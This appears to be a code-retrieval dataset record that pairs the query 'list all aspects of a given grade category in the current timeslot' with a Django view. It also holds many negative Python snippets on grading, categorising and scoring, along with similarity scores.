return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n # get or create learner\n learner, created = Learner.objects.get_or_create(**serializer.data)\n\n grade = get_engine().grade(learner, collection)\n return Response({'learner': serializer.data, 'grade': grade})", "def publish_grade(self):\r\n score = self.lcp.get_score()\r\n self.runtime.publish(\r\n self,\r\n 'grade',\r\n {\r\n 'value': score['score'],\r\n 'max_value': score['total'],\r\n }\r\n )\r\n\r\n return {'grade': score['score'], 'max_grade': score['total']}", "async def category(self,ctx):\n await ctx.send(\"Yes this is a category.\")", "def test_weighted_exam(self):\r\n self.weighted_setup()\r\n self.submit_question_answer('FinalQuestion', {'2_1': 'Correct', '2_2': 'Correct'})\r\n self.check_grade_percent(0.75)", "def this_is_the_grade(self, grade_to_set):\n\n\t\tcmds.intField(self.grade_intField, edit = True, value = grade_to_set['grade_value'])\n\t\tself.update_subcategory('intField')\n\t\tif grade_to_set['grade_value'] is not '':\n\t\t\tcmds.scrollField(self.comments_text_field, edit = True, text = grade_to_set['comment_text'])\n\t\t\tself.update_subcategory('comments_text')\n\t\tif grade_to_set['default_comments_text'] is not '':\t\n\t\t\tcmds.scrollField(self.default_comments, edit = True, text = grade_to_set['default_comments_text'])\n\t\t\tself.update_subcategory('default_comments_text')\n\t\tif grade_to_set['example_comments_text'] is not '':\n\t\t\tcmds.scrollField(self.example_comments, edit = True, text = grade_to_set['example_comments_text'])\n\t\t\tself.update_subcategory('example_comments_text')\n\n\t\tself.auto_flagged_list = grade_to_set.get('examples', [])\n\t\tself.log('auto_flagged_list updated: \\n{}'.format(self.auto_flagged_list))", "def _explain(self):\n self._explain_simple_consensus()\n logger.LOGGER.info(\"One or more groups have stances on both sides of this bill:\")\n logger.LOGGER.info(self._decision.split_group)", "def test_grading_exception(self):\r\n all_gradesets, all_errors = self._gradesets_and_errors_for(self.course.id, self.students)\r\n student1, student2, student3, student4, student5 = self.students\r\n self.assertEqual(\r\n all_errors,\r\n {\r\n student3: \"I don't like student3\",\r\n student4: \"I don't like student4\"\r\n }\r\n )\r\n\r\n # But we should still have five gradesets\r\n self.assertEqual(len(all_gradesets), 5)\r\n\r\n # Even though two will simply be empty\r\n self.assertFalse(all_gradesets[student3])\r\n self.assertFalse(all_gradesets[student4])\r\n\r\n # The rest will have grade information in them\r\n self.assertTrue(all_gradesets[student1])\r\n self.assertTrue(all_gradesets[student2])\r\n self.assertTrue(all_gradesets[student5])", "def level(score):\n user_level = \"\"\n if score < 20:\n user_level = \"elementary\"\n elif score < 30:\n user_level = \"intermediate\"\n elif score < 35:\n user_level = \"upper intermediate\"\n else:\n user_level = \"advanced\"\n return user_level", "def get_grade(self):\n return self.__grade_value", "def __statistics_disciplines_graded(self):\n disciplines_list = self.__grade_controller.get_list_of_graded_disciplines()\n if len(disciplines_list) == 0:\n print(\"There is no graded discipline!\")\n return\n\n for discipline in disciplines_list:\n print(str(discipline) + \"\\n\")", "def grade_report(course):\n report = []\n for st in course.get_students():\n try:\n average = sum(course.get_grades(st)) / len(course.get_grades(st))\n report.append(str(st) + '\\'s mean grade is: ' + str(average) + '.')\n except ZeroDivisionError:\n report.append(str(st) + ' has no grades.')\n return '\\n'.join(report)", "def weighted_setup(self):\r\n\r\n grading_policy = {\r\n \"GRADER\": [{\r\n \"type\": \"Homework\",\r\n \"min_count\": 1,\r\n \"drop_count\": 0,\r\n \"short_label\": \"HW\",\r\n \"weight\": 0.25\r\n }, {\r\n \"type\": \"Final\",\r\n \"name\": \"Final Section\",\r\n \"short_label\": \"Final\",\r\n \"weight\": 0.75\r\n }]\r\n }\r\n self.add_grading_policy(grading_policy)\r\n\r\n # set up a structure of 1 homework and 1 final\r\n self.homework = self.add_graded_section_to_course('homework')\r\n self.problem = self.add_dropdown_to_section(self.homework.location, 'H1P1')\r\n self.final = self.add_graded_section_to_course('Final Section', 'Final')\r\n self.final_question = self.add_dropdown_to_section(self.final.location, 'FinalQuestion')", "def decide():", "def grade_summary(request, course_key):\r\n course = get_course_with_access(request.user, 'staff', course_key)\r\n\r\n # For now, just a page\r\n context = {'course': course,\r\n 'staff_access': True, }\r\n return render_to_response('courseware/grade_summary.html', context)", "def dropping_setup(self):\r\n\r\n grading_policy = {\r\n \"GRADER\": [\r\n {\r\n \"type\": \"Homework\",\r\n \"min_count\": 3,\r\n \"drop_count\": 1,\r\n \"short_label\": \"HW\",\r\n \"weight\": 1\r\n }]\r\n }\r\n self.add_grading_policy(grading_policy)\r\n\r\n # Set up a course structure that just consists of 3 homeworks.\r\n # Since the grading policy drops 1 entire homework, each problem is worth 25%\r\n\r\n # names for the problem in the homeworks\r\n self.hw1_names = ['h1p1', 'h1p2']\r\n self.hw2_names = ['h2p1', 'h2p2']\r\n self.hw3_names = ['h3p1', 'h3p2']\r\n\r\n self.homework1 = self.add_graded_section_to_course('homework1')\r\n self.add_dropdown_to_section(self.homework1.location, self.hw1_names[0], 1)\r\n self.add_dropdown_to_section(self.homework1.location, self.hw1_names[1], 1)\r\n self.homework2 = self.add_graded_section_to_course('homework2')\r\n self.add_dropdown_to_section(self.homework2.location, self.hw2_names[0], 1)\r\n self.add_dropdown_to_section(self.homework2.location, self.hw2_names[1], 1)\r\n self.homework3 = self.add_graded_section_to_course('homework3')\r\n self.add_dropdown_to_section(self.homework3.location, self.hw3_names[0], 1)\r\n self.add_dropdown_to_section(self.homework3.location, self.hw3_names[1], 1)", "def enrichment_factor(y_true, y_score, percentage=..., pos_label=..., kind=...):\n ...", "def get_labels(self):\n return [\"contradiction\", \"entailment\", \"neutral\"]", "def rules(self):\n self.rule1 = min(self.location_is_lessDemand, self.area_is_small, self.unfunishing)\n self.rule2 = min(self.location_is_lessDemand, max(self.area_is_small, self.area_is_average), self.access_is_good)\n self.rule3 = min(self.location_is_veryHighDemand, self.area_is_average, self.fac_is_low, self.access_is_average)\n self.rule4 = min(self.location_is_veryLessDemand, self.area_is_verysmall, self.fully_funishing)\n self.rule5 = min(self.location_is_lessDemand, self.fac_is_average, max(self.area_is_small, self.area_is_average))\n self.rule6 = min(max(self.location_is_lessDemand, self.location_is_averageDemand), self.access_is_good)\n self.rule7 = min(self.location_is_lessDemand, self.access_is_good, self.area_is_large, self.partially_funishing)\n self.rule8 = min(self.location_is_highDemand, self.access_is_good, max(self.bed_is_less, self.bath_is_average))\n self.rule9 = min(self.location_is_veryHighDemand, self.area_is_large, self.unfunishing)\n self.rule10 = min(self.access_is_good, self.area_is_average, (1 - self.unfunishing))\n self.rule11 = min(self.access_is_good, self.area_is_large, self.partially_funishing, self.bed_is_more, self.bath_is_more)", "def test_wrong_answers(self):\r\n self.basic_setup()\r\n self.submit_question_answer('p1', {'2_1': 'Correct'})\r\n self.submit_question_answer('p2', {'2_1': 'Correct'})\r\n self.submit_question_answer('p3', {'2_1': 'Incorrect'})\r\n self.check_grade_percent(0.67)\r\n self.assertEqual(self.get_grade_summary()['grade'], 'B')", "def get_pertinence (cats):\n sorted_cats = sorted(cats, key=cats.__getitem__, reverse=True)\n score_to_test = cats[sorted_cats[0]]\n all_values = [cats[key] for key in sorted_cats]\n average = sum(all_values) / len(all_values)\n logged_rest = [log(abs(average - val) + 1) for val in all_values[1:]]\n \n rest_average = sum(logged_rest) / len(logged_rest)\n logged_main = log(abs(average - all_values[0])+1)\n \n importance = max(logged_main - rest_average, 0)\n \n return importance", "def category_choice(self):\n self.leave_category_choice = 1\n while self.leave_category_choice:\n print(fr.FR[15])\n for element in config.CATEGORIES:\n print(str(config.CATEGORIES.index(element)+1)\n + \" : \" + element)\n self.category_choice_input()", "def categorize(cleaned_news):\r\n _ret = ''\r\n relative_categories = ['robbery', 'mugging', 'murder', 'sexual harrasment', 'theft', 'road accident', 'drugs']\r\n classification = nv.newsClassifier.classify(cleaned_news)\r\n for cat in classification:\r\n if cat[1] > 0 and cat[0] in relative_categories:\r\n _ret += cat[0] + ', '\r\n return _ret", "def get_score_bucket(grade, max_grade):\r\n score_bucket = \"incorrect\"\r\n if(grade > 0 and grade < max_grade):\r\n score_bucket = \"partial\"\r\n elif(grade == max_grade):\r\n score_bucket = \"correct\"\r\n\r\n return score_bucket", "def encode(category_main : ):", "def explain(self):", "def valid_category(tags):\n for category in tags:\n if \"task-\" in category:\n if \"bug\" in category:\n return True, \"task-bug-hunting\"\n return True, category\n if category == \"blog\" or category == \"blogs\":\n return True, \"blog\"\n elif category == \"iamutopian\":\n return True, \"iamutopian\"\n elif \"idea\" in category or \"suggestion\" in category:\n return True, \"ideas\"\n elif category == \"development\":\n return True, \"development\"\n elif category == \"graphic\" or category == \"graphics\":\n return True, \"graphics\"\n elif \"bughunt\" in category or \"bug-hunt\" in category:\n return True, \"bug-hunting\"\n elif \"analysis\" in category:\n return True, \"analysis\"\n elif \"visibility\" in category or \"social\" in category:\n return True, \"social\"\n elif \"videotut\" in category or \"video-tut\" in category:\n return True, \"video-tutorials\"\n elif category == \"tutorial\" or category == \"tutorials\":\n return True, \"tutorials\"\n elif \"copywrit\" in category:\n return True, \"copywriting\"\n elif \"document\" in category:\n return True, \"documentation\"\n elif \"translation\" in category:\n return True, \"translations\"\n elif category == \"antiabuse\" or category == \"anti-abuse\":\n return True, \"anti-abuse\"\n return False, \"\"", "def test_bad_probabilities(self):\n categories = {\"asdfa\": 0.05, 2: 0.2, 3: 0.3, 4: 0.4}\n with pytest.raises(ValueError):\n Categorical(\"yolo\", categories, shape=2)", "def alpha_interpretation(self, alpha_score):\r\n if alpha_score <= 0.667:\r\n alpha_interpretation = 'Unreliable agreement'\r\n elif 0.667 < alpha_score < 0.81:\r\n alpha_interpretation = 'Acceptable agreement'\r\n elif 0.80 < alpha_score <= 1:\r\n alpha_interpretation = 'Substantial agreement'\r\n elif alpha_score == 1:\r\n alpha_interpretation = 'Perfect agreement'\r\n return alpha_interpretation", "def testDriver():\n exam1=90\n exam2=85\n assignmentScores = [50, 60, 70, 80, ]\n computeGrades(exam1, exam2, assignmentScores)", "def get_score_summary(fname):\n gradedata = {}\n fhandler = open(fname, 'r')\n rest_data = csv.reader(fhandler)\n for row in rest_data:\n if row[10] not in ['P', '', 'GRADE']:\n gradedata[row[0]] = [row[1], row[10]]\n gradedata.update(gradedata)\n fhandler.close()\n\n gradereview = {}\n for value in gradedata.itervalues():\n if value[0] not in gradereview.iterkeys():\n count1 = 1\n count2 = GRADESCL[value[1]]\n else:\n count1 = gradereview[value[0]][0] + 1\n count2 = gradereview[value[0]][1] + GRADESCL[value[1]]\n gradereview[value[0]] = (count1, count2)\n gradereview.update(gradereview)\n grade = {}\n for key in gradereview.iterkeys():\n count1 = gradereview[key][0]\n count2 = gradereview[key][1]/gradereview[key][0]\n grade[key] = (count1, count2)\n return grade", "def categorize(book: TextIO) -> list:\n chunks = get_texts(book)\n texts = []\n for t in chunks:\n level = difficulty(complexity(t))\n texts.append((t, level, keywords(t)))\n return texts", "def category_of(element):\n if element in COLORS:\n return 'colors'\n if element in PETS:\n return 'pets'\n if element in BEVERAGES:\n return 'beverages'\n if element in CIGARETTES:\n return 'cigarettes'\n if element in NATIONALITY:\n return 'nationality'\n return 'numbers'", "def scoring(self):\n pass", "def descString(self):\n return \"\".join ([self.Name, \" (\", str(self.RollCount), \"d\"\\\n , str(self.RollMax), \"; \", str(self.CritRollMin), \"-\"\\\n , str(self.CritRollMax), \"x\", str (self.CritRollMult)\\\n , \") - \", str(self.Value), \" gp\"])", "def __str__(self):\n return \"%s (graded by %s at %s)\" % (self.submission, self.grader, self.date)", "def get_description(self):\n text = \"is a student's t distribution; characterised by its degrees of freedom, which here is\"+str(self.dofs)+\".\"\n return text", "def exercise_5(self):\n student_data = self.student_data\n # Create a dictionary mapping subgroup values to colors\n palette_colors = {\"Rural\": \"green\", \"Urban\": \"blue\"}\n\n # Create a count plot of school with location subgroups\n sns.countplot(x=\"school\", data=student_data\n , hue = \"location\"\n , palette = palette_colors)\n\n\n # Display plot\n plt.show()", "def abilityScores(self):\n mods = [(self.str -10)/2,\n (self.dex-10)/2,\n (self.con-10)/2,\n (self.int-10)/2,\n (self.wis-10)/2,\n (self.cha-10)/2]\n return \"STR: {0} ({1}) \\nDEX: {2} ({3})\\nCON: {4} ({5})\".format(self.str,\n mods[0],\n self.dex,\n mods[1],\n self.con,\n mods[2])+\"\\n\" \\\n \"INT: {0} ({1})\\nWIS: {2} ({3})\\nCHA: {4} ({5})\".format(self.int,\n mods[3],\n self.wis,\n mods[4],\n self.cha,\n mods[5])", "def gradeReport(course):\n report = []\n for student in course.allStudents():\n total = 0.0\n numberOfGrades = 0\n for grade in course.getGrades(student):\n total += grade\n numberOfGrades += 1\n \n try:\n average = total / numberOfGrades\n report.append(str(student) + \"'s mean grade is \" + str(average))\n except ZeroDivisionError:\n report.append(str(student) + \" has no grades\")\n \n return '\\n'.join(report)", "def main():\n\n students = [\"Chris\", \"Jesse\", \"Sally\"]\n grades = [90, 80, 70]\n print_gradebook(students, grades)", "def Subcategories():\n subcat = {\n \t\"Featured\": 0,\n \t\"All\": 1,\n \t\"Collectibles\": 2,\n \t\"Clothing\": 3,\n \t\"BodyParts\": 4,\n \t\"Gear\": 5,\n \t\"Models\": 6,\n \t\"Plugins\": 7,\n \t\"Decals\": 8,\n \t\"Hats\": 9,\n \t\"Faces\": 10,\n \t\"Packages\": 11,\n \t\"Shirts\": 12,\n \t\"Tshirts\": 13,\n \t\"Pants\": 14,\n \t\"Heads\": 15,\n \t\"Audio\": 16,\n \t\"RobloxCreated\": 17,\n \t\"Meshes\": 18,\n \t\"Accessories\": 19,\n \t\"HairAccessories\": 20,\n \t\"FaceAccessories\": 21,\n \t\"NeckAccessories\": 22,\n \t\"ShoulderAccessories\": 23,\n \t\"FrontAccessories\": 24,\n \t\"BackAccessories\": 25,\n \t\"WaistAccessories\": 26,\n \t\"AvatarAnimations\": 27,\n \t\"ClimbAnimations\": 28,\n \t\"FallAnimations\": 30,\n \t\"IdleAnimations\": 31,\n\t \"JumpAnimations\": 32,\n\t \"RunAnimations\": 33,\n \t\"SwimAnimations\": 34,\n \t\"WalkAnimations\": 35,\n \t\"AnimationPackage\": 36,\n \t\"Bundles\": 37,\n \t\"AnimationBundles\": 38,\n\t \"EmoteAnimations\": 39,\n\t \"CommunityCreations\": 40,\n\t \"Video\": 41,\n\t \"Recommended\": 51\n }\n return subcat", "def disp_score():", "def update_grade(self, course, grade):\n if course not in self.courses:\n raise NameError('This student is not enrolled in that course')\n else:\n self.courses[course] = grade\n\n return self" ]
[ "0.625208", "0.6094908", "0.60138935", "0.5881098", "0.5708122", "0.5681825", "0.5661043", "0.56477875", "0.5588508", "0.5543916", "0.552775", "0.5490752", "0.5484218", "0.54239833", "0.5411527", "0.5353282", "0.53336465", "0.5323209", "0.5313484", "0.53094536", "0.5239492", "0.5222063", "0.5182566", "0.5167344", "0.5165096", "0.51565784", "0.5140317", "0.51323456", "0.5121351", "0.51167804", "0.5112725", "0.51086366", "0.5101681", "0.50853795", "0.5080263", "0.5077483", "0.50765914", "0.5047738", "0.50311095", "0.50203454", "0.5013274", "0.49741355", "0.49400428", "0.49370128", "0.49189937", "0.49151585", "0.49084783", "0.48998287", "0.4896411", "0.48871538", "0.4880013", "0.4879825", "0.48676193", "0.48478687", "0.4834165", "0.4830536", "0.48151153", "0.4812191", "0.480704", "0.48047203", "0.4802863", "0.47928825", "0.47830695", "0.47828367", "0.47703594", "0.476352", "0.47622848", "0.47580558", "0.47546497", "0.47535938", "0.47471613", "0.47430822", "0.4731235", "0.47294307", "0.47272295", "0.47083077", "0.4707595", "0.47038645", "0.4703344", "0.46985364", "0.46983898", "0.46941957", "0.46928543", "0.4691315", "0.46880937", "0.4686428", "0.46842575", "0.4664765", "0.4663048", "0.4661732", "0.46575686", "0.46575552", "0.46388003", "0.46382564", "0.46381718", "0.46301562", "0.46281445", "0.4625794", "0.46194455", "0.46107963", "0.46078297" ]
0.0
-1
List all aspects of a given grade category in the current timeslot
def list_aspects(request, pk): category = get_object_or_404(GradeCategory, pk=pk) aspects = GradeCategoryAspect.objects.filter(Category=category) ts = get_timeslot() return render(request, "results/list_aspects.html", { "aspects": aspects, 'ts': ts, 'cat': category, })
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def time_budget_analysis(cursor, plot_parameters, by_category=False):\n\n categories, out = {}, []\n for subject in plot_parameters[\"selected subjects\"]:\n out_cat, categories[subject] = [], {}\n\n for behavior in plot_parameters[\"selected behaviors\"]:\n\n if plot_parameters[\"include modifiers\"]:\n\n cursor.execute(\"SELECT distinct modifiers FROM events WHERE subject = ? AND code = ?\",\n (subject, behavior))\n distinct_modifiers = list(cursor.fetchall())\n\n if not distinct_modifiers:\n if not plot_parameters[\"exclude behaviors\"]:\n\n if {self.pj[ETHOGRAM][idx][\"type\"] for idx in self.pj[ETHOGRAM] if\n self.pj[ETHOGRAM][idx][\"code\"] == behavior} == {\"State event\"}:\n out.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"-\",\n \"duration\": 0,\n \"duration_mean\": 0,\n \"duration_stdev\": \"NA\",\n \"number\": \"0\",\n \"inter_duration_mean\": \"NA\",\n \"inter_duration_stdev\": \"NA\"})\n else: # point\n out.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"-\",\n \"duration\": \"NA\",\n \"duration_mean\": \"NA\",\n \"duration_stdev\": \"NA\",\n \"number\": \"0\",\n \"inter_duration_mean\": \"NA\",\n \"inter_duration_stdev\": \"NA\"})\n continue\n\n if POINT in self.eventType(behavior).upper():\n for modifier in distinct_modifiers:\n\n cursor.execute((\"SELECT occurence, observation FROM events \"\n \"WHERE subject = ? \"\n \"AND code = ? \"\n \"AND modifiers = ? \"\n \"ORDER BY observation, occurence\"),\n (subject, behavior, modifier[0]))\n\n rows = cursor.fetchall()\n\n # inter events duration\n all_event_interdurations = []\n for idx, row in enumerate(rows):\n if idx and row[1] == rows[idx - 1][1]:\n all_event_interdurations.append(float(row[0]) - float(rows[idx - 1][0]))\n\n out_cat.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": modifier[0],\n \"duration\": \"NA\",\n \"duration_mean\": \"NA\",\n \"duration_stdev\": \"NA\",\n \"number\": len(rows),\n \"inter_duration_mean\": round(statistics.mean(all_event_interdurations),\n 3) if len(\n all_event_interdurations) else \"NA\",\n \"inter_duration_stdev\": round(\n statistics.stdev(all_event_interdurations), 3) if len(\n all_event_interdurations) > 1 else \"NA\"\n })\n\n if STATE in self.eventType(behavior).upper():\n for modifier in distinct_modifiers:\n\n cursor.execute((\"SELECT occurence, observation FROM events \"\n \"WHERE subject = ? \"\n \"AND code = ? \"\n \"AND modifiers = ? \"\n \"ORDER BY observation, occurence\"),\n (subject, behavior, modifier[0]))\n\n rows = list(cursor.fetchall())\n if len(rows) % 2:\n out.append({\"subject\": subject, \"behavior\": behavior,\n \"modifiers\": modifier[0], \"duration\": UNPAIRED,\n \"duration_mean\": UNPAIRED, \"duration_stdev\": UNPAIRED,\n \"number\": UNPAIRED, \"inter_duration_mean\": UNPAIRED,\n \"inter_duration_stdev\": UNPAIRED})\n else:\n all_event_durations, all_event_interdurations = [], []\n for idx, row in enumerate(rows):\n # event\n if idx % 2 == 0:\n new_init, new_end = float(row[0]), float(rows[idx + 1][0])\n\n all_event_durations.append(new_end - new_init)\n\n # inter event if same observation\n if idx % 2 and idx != len(rows) - 1 and row[1] == rows[idx + 1][1]:\n if plot_parameters[\"start time\"] <= row[0] <= plot_parameters[\n \"end time\"] and plot_parameters[\"start time\"] <= rows[idx + 1][0] <= \\\n plot_parameters[\"end time\"]:\n all_event_interdurations.append(float(rows[idx + 1][0]) - float(row[0]))\n\n # all_event_interdurations.append(float(rows[idx + 1][0]) - float(row[0]))\n\n out_cat.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": modifier[0],\n \"duration\": round(sum(all_event_durations), 3),\n \"duration_mean\": round(statistics.mean(all_event_durations),\n 3) if len(all_event_durations) else \"NA\",\n \"duration_stdev\": round(statistics.stdev(all_event_durations),\n 3) if len(\n all_event_durations) > 1 else \"NA\",\n \"number\": len(all_event_durations),\n \"inter_duration_mean\": round(\n statistics.mean(all_event_interdurations), 3) if len(\n all_event_interdurations) else \"NA\",\n \"inter_duration_stdev\": round(\n statistics.stdev(all_event_interdurations), 3) if len(\n all_event_interdurations) > 1 else \"NA\"\n })\n\n else: # no modifiers\n\n if POINT in self.eventType(behavior).upper():\n\n # if len(selectedObservations) > 1:\n cursor.execute(\n \"SELECT occurence,observation FROM events WHERE subject = ? AND code = ? ORDER BY observation, occurence\",\n (subject, behavior))\n\n rows = list(cursor.fetchall())\n\n if len(selectedObservations) == 1:\n new_rows = []\n for occurence, observation in rows:\n new_occurence = max(float(plot_parameters[\"start time\"]), occurence)\n new_occurence = min(new_occurence, float(plot_parameters[\"end time\"]))\n new_rows.append([new_occurence, observation])\n rows = list(new_rows)\n\n if not len(rows):\n if not plot_parameters[\"exclude behaviors\"]:\n\n if {self.pj[ETHOGRAM][idx][\"type\"] for idx in self.pj[ETHOGRAM] if\n self.pj[ETHOGRAM][idx][\"code\"] == behavior} == {\"State event\"}:\n out.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"\",\n \"duration\": 0,\n \"duration_mean\": 0,\n \"duration_stdev\": \"NA\",\n \"number\": \"0\",\n \"inter_duration_mean\": \"NA\",\n \"inter_duration_stdev\": \"NA\"})\n else: # point\n out.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"\",\n \"duration\": \"NA\",\n \"duration_mean\": \"NA\",\n \"duration_stdev\": \"NA\",\n \"number\": \"0\",\n \"inter_duration_mean\": \"NA\",\n \"inter_duration_stdev\": \"NA\"})\n continue\n\n # inter events duration\n all_event_interdurations = []\n for idx, row in enumerate(rows):\n if idx and row[1] == rows[idx - 1][1]:\n all_event_interdurations.append(float(row[0]) - float(rows[idx - 1][0]))\n\n out_cat.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"-\",\n \"duration\": \"NA\",\n \"duration_mean\": \"NA\",\n \"duration_stdev\": \"NA\",\n \"number\": len(rows),\n \"inter_duration_mean\": round(statistics.mean(all_event_interdurations),\n 3) if len(all_event_interdurations) else \"NA\",\n \"inter_duration_stdev\": round(statistics.stdev(all_event_interdurations),\n 3) if len(\n all_event_interdurations) > 1 else \"NA\"\n })\n\n if STATE in self.eventType(behavior).upper():\n\n cursor.execute(\n \"SELECT occurence, observation FROM events WHERE subject = ? AND code = ? ORDER BY observation, occurence\",\n (subject, behavior))\n\n rows = list(cursor.fetchall())\n if not len(rows):\n if not plot_parameters[\"exclude behaviors\"]: # include behaviors without events\n out.append({\"subject\": subject, \"behavior\": behavior,\n \"modifiers\": \"-\", \"duration\": 0, \"duration_mean\": 0,\n \"duration_stdev\": \"NA\", \"number\": 0, \"inter_duration_mean\": \"-\",\n \"inter_duration_stdev\": \"-\"})\n continue\n\n if len(rows) % 2:\n out.append({\"subject\": subject, \"behavior\": behavior, \"modifiers\": \"NA\",\n \"duration\": UNPAIRED, \"duration_mean\": UNPAIRED, \"duration_stdev\": UNPAIRED,\n \"number\": UNPAIRED, \"inter_duration_mean\": UNPAIRED,\n \"inter_duration_stdev\": UNPAIRED})\n else:\n all_event_durations, all_event_interdurations = [], []\n for idx, row in enumerate(rows):\n # event\n if idx % 2 == 0:\n new_init, new_end = float(row[0]), float(rows[idx + 1][0])\n\n all_event_durations.append(new_end - new_init)\n\n # inter event if same observation\n if idx % 2 and idx != len(rows) - 1 and row[1] == rows[idx + 1][1]:\n if plot_parameters[\"start time\"] <= row[0] <= plot_parameters[\"end time\"] and \\\n plot_parameters[\"start time\"] <= rows[idx + 1][0] <= plot_parameters[\n \"end time\"]:\n all_event_interdurations.append(float(rows[idx + 1][0]) - float(row[0]))\n\n out_cat.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"-\",\n \"duration\": round(sum(all_event_durations), 3),\n \"duration_mean\": round(statistics.mean(all_event_durations), 3) if len(\n all_event_durations) else \"NA\",\n \"duration_stdev\": round(statistics.stdev(all_event_durations),\n 3) if len(all_event_durations) > 1 else \"NA\",\n \"number\": len(all_event_durations),\n \"inter_duration_mean\": round(statistics.mean(all_event_interdurations),\n 3) if len(\n all_event_interdurations) else \"NA\",\n \"inter_duration_stdev\": round(\n statistics.stdev(all_event_interdurations), 3) if len(\n all_event_interdurations) > 1 else \"NA\"\n })\n\n out += out_cat\n\n if by_category: # and flagCategories:\n\n for behav in out_cat:\n\n try:\n category = [self.pj[ETHOGRAM][x][\"category\"] for x in self.pj[ETHOGRAM] if\n \"category\" in self.pj[ETHOGRAM][x] and self.pj[ETHOGRAM][x][\"code\"] == behav[\n 'behavior']][0]\n except:\n category = \"\"\n\n if category in categories[subject]:\n if behav[\"duration\"] not in [\"-\", \"NA\"] and categories[subject][category][\n \"duration\"] != \"-\":\n categories[subject][category][\"duration\"] += behav[\"duration\"]\n else:\n categories[subject][category][\"duration\"] = \"-\"\n categories[subject][category][\"number\"] += behav[\"number\"]\n else:\n categories[subject][category] = {\"duration\": behav[\"duration\"], \"number\": behav[\"number\"]}\n\n out_sorted = []\n for subject in plot_parameters[\"selected subjects\"]:\n for behavior in plot_parameters[\"selected behaviors\"]:\n for row in out:\n if row[\"subject\"] == subject and row[\"behavior\"] == behavior:\n out_sorted.append(row)\n\n ### http://stackoverflow.com/questions/673867/python-arbitrary-order-by\n return out_sorted, categories", "def about(request, pk=None):\n if pk and get_grouptype('3') in request.user.groups.all():\n ts = get_object_or_404(TimeSlot, pk=pk)\n else:\n ts = get_timeslot()\n return render(request, \"results/about_grades.html\", {\n 'scores': CategoryAspectResult.ResultOptions,\n \"categories\": GradeCategory.objects.filter(TimeSlot=ts),\n 'ts': ts,\n })", "def getCategory():", "def time_budget(self, mode):\n\n def time_budget_analysis(cursor, plot_parameters, by_category=False):\n \"\"\"\n extract number of occurrences, total duration, mean ...\n if start_time = 0 and end_time = 0 all events are extracted\n \"\"\"\n\n categories, out = {}, []\n for subject in plot_parameters[\"selected subjects\"]:\n out_cat, categories[subject] = [], {}\n\n for behavior in plot_parameters[\"selected behaviors\"]:\n\n if plot_parameters[\"include modifiers\"]:\n\n cursor.execute(\"SELECT distinct modifiers FROM events WHERE subject = ? AND code = ?\",\n (subject, behavior))\n distinct_modifiers = list(cursor.fetchall())\n\n if not distinct_modifiers:\n if not plot_parameters[\"exclude behaviors\"]:\n\n if {self.pj[ETHOGRAM][idx][\"type\"] for idx in self.pj[ETHOGRAM] if\n self.pj[ETHOGRAM][idx][\"code\"] == behavior} == {\"State event\"}:\n out.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"-\",\n \"duration\": 0,\n \"duration_mean\": 0,\n \"duration_stdev\": \"NA\",\n \"number\": \"0\",\n \"inter_duration_mean\": \"NA\",\n \"inter_duration_stdev\": \"NA\"})\n else: # point\n out.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"-\",\n \"duration\": \"NA\",\n \"duration_mean\": \"NA\",\n \"duration_stdev\": \"NA\",\n \"number\": \"0\",\n \"inter_duration_mean\": \"NA\",\n \"inter_duration_stdev\": \"NA\"})\n continue\n\n if POINT in self.eventType(behavior).upper():\n for modifier in distinct_modifiers:\n\n cursor.execute((\"SELECT occurence, observation FROM events \"\n \"WHERE subject = ? \"\n \"AND code = ? \"\n \"AND modifiers = ? \"\n \"ORDER BY observation, occurence\"),\n (subject, behavior, modifier[0]))\n\n rows = cursor.fetchall()\n\n # inter events duration\n all_event_interdurations = []\n for idx, row in enumerate(rows):\n if idx and row[1] == rows[idx - 1][1]:\n all_event_interdurations.append(float(row[0]) - float(rows[idx - 1][0]))\n\n out_cat.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": modifier[0],\n \"duration\": \"NA\",\n \"duration_mean\": \"NA\",\n \"duration_stdev\": \"NA\",\n \"number\": len(rows),\n \"inter_duration_mean\": round(statistics.mean(all_event_interdurations),\n 3) if len(\n all_event_interdurations) else \"NA\",\n \"inter_duration_stdev\": round(\n statistics.stdev(all_event_interdurations), 3) if len(\n all_event_interdurations) > 1 else \"NA\"\n })\n\n if STATE in self.eventType(behavior).upper():\n for modifier in distinct_modifiers:\n\n cursor.execute((\"SELECT occurence, observation FROM events \"\n \"WHERE subject = ? \"\n \"AND code = ? \"\n \"AND modifiers = ? \"\n \"ORDER BY observation, occurence\"),\n (subject, behavior, modifier[0]))\n\n rows = list(cursor.fetchall())\n if len(rows) % 2:\n out.append({\"subject\": subject, \"behavior\": behavior,\n \"modifiers\": modifier[0], \"duration\": UNPAIRED,\n \"duration_mean\": UNPAIRED, \"duration_stdev\": UNPAIRED,\n \"number\": UNPAIRED, \"inter_duration_mean\": UNPAIRED,\n \"inter_duration_stdev\": UNPAIRED})\n else:\n all_event_durations, all_event_interdurations = [], []\n for idx, row in enumerate(rows):\n # event\n if idx % 2 == 0:\n new_init, new_end = float(row[0]), float(rows[idx + 1][0])\n\n all_event_durations.append(new_end - new_init)\n\n # inter event if same observation\n if idx % 2 and idx != len(rows) - 1 and row[1] == rows[idx + 1][1]:\n if plot_parameters[\"start time\"] <= row[0] <= plot_parameters[\n \"end time\"] and plot_parameters[\"start time\"] <= rows[idx + 1][0] <= \\\n plot_parameters[\"end time\"]:\n all_event_interdurations.append(float(rows[idx + 1][0]) - float(row[0]))\n\n # all_event_interdurations.append(float(rows[idx + 1][0]) - float(row[0]))\n\n out_cat.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": modifier[0],\n \"duration\": round(sum(all_event_durations), 3),\n \"duration_mean\": round(statistics.mean(all_event_durations),\n 3) if 